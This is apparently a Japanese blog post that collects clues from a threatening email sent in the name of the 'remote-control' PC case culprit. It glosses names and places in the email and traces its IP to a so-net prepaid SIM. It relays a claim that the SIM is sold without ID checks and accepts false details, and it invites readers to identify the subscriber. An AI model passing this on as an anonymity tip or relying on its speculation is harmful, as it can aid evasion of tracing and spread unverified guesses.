  • 正式名称は『聖路加国際病院』。東京都中央区・築地に実在する病院。
  • 地下鉄サリン事件(1995-)の発生時、最寄り駅(築地駅)で最も多くの被害者が発生し、同事件の最大の被害者受け入れ先となった病院としても有名。>ソース
お茶の水小学校
  • 東京にある国立小学校。皇族が入学する学校としても有名。
  • 遠隔操作事件では犯行予告のターゲットにされた。
小女子
悠仁
  • 日本の皇族。秋篠宮文仁親王と同妃紀子の第一子(長男)。
江川紹子
  • 日本のジャーナリスト。オウム事件や遠隔操作事件関連の取材を積極的に行っている事でも有名。
  • ソース
VXガス
ポア
  • オウム真理教が『殺す』の意味で使っていたとして有名。
ドコモショップ稚内店
牛五十頭
  • なぜ牛?50頭の意味合いは何だろう?なんとなくかな?
  • 今回の事件、犯行予告との関連性は不明。
Caroline Kennedy
●メモ
  • 唯一、ドコモショップ『稚内店』の出所がようわからんので気になる!!情報求む。

■メールの配信元 nuro.jp はso-netのプリペイド式のSIMと判明

メールの配信元 mp76f1fa5d.ap.nuro.jp(118.241.250.93)はso-netのプリペイドSIMで間違いない模様。

コメント欄の書き込みによると、本人確認なし、適当な個人情報でも利用可能との事。

プリペイドSIM自体に住所等の入力は求められますが嘘の情報も通ることを確認しています。
店頭購入のみのようですが本人確認してないので特定は厳しいでしょう。

このIPの基地局はどのあたり?契約者は誰?

捜査関係者は早急に発信元IPの割り出しを行うべき。

関連リンク

※この情報は下記の情報を元に記述しています。情報提供ありがとうございました。

http://www.so-net.ne.jp/prepaid/



■本物?摸倣犯?

いまんとこわからん。

■2ちゃんねるの関連スレ一覧

嫌儲:【遠隔操作事件】真犯人「小保方銃蔵」からの秘密暴露メールが公開される ★1〜
ニュース速報+:【遠隔操作事件】真犯人名乗る「小保方銃蔵」からのメール、落合弁護士などに届く★1〜
片山被告 「自作自演と言われるかもしれない ★1〜

■その他メモ(関連リンク、未確認情報など)

以上、ざっくりまとめでしたー。

なにか、お気づきになった方は、コメ欄に投稿おねがいします。m(_ _)m

©satoru.net
Mail Twitter